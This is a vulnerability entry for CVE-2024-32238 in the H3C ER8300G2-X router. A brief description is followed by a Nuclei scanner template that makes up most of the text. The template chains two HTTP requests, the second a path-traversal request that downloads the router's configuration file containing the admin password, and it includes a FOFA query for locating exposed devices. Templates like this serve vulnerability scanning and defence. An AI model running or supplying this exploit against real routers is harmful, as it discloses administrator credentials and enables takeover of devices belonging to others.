漏洞描述
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
CVE-2024-32238: H3C ER8300G2-X - Password Disclosure
PoC代码[已公开]
id: CVE-2024-32238
info:
name: H3C ER8300G2-X - Password Disclosure
author: s4e-io,adeljck
severity: critical
description: |
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
reference:
- https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
- https://github.com/asdfjkl11/CVE-2024-32238/issues/1
- https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
- https://github.com/20142995/nuclei-templates
- https://github.com/FuBoLuSec/CVE-2024-32238
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-32238
cwe-id: CWE-522
epss-score: 0.90699
epss-percentile: 0.99602
metadata:
verified: true
max-request: 2
fofa-query: body="icg_helpScript.js"
tags: cve,cve2024,h3c,router,info-leak,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET /userLogin.asp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: module_name
part: body
internal: true
group: 1
regex:
- "<title>([A-Za-z0-9-]+)系统管理</title>"
- raw:
- |
GET /userLogin.asp/../actionpolicy_status/../{{module_name}}.cfg HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(content_type, "application/x-unknown")'
- 'contains_all(body, "admpwd=", "auxauthmode=")'
- 'contains(server, "H3C-Miniware")'
condition: and
# digest: 4a0a00473045022100940343f461c6cd4649faed3128613964aadaa35c5f48bd04d11b1b1cb6e65c8e0220620b7f1de3889fe3f2eba27b9761a2483421fdaccde42a9364cf9b1b56b710b9:922c64590222798bb761d5b6d8e72950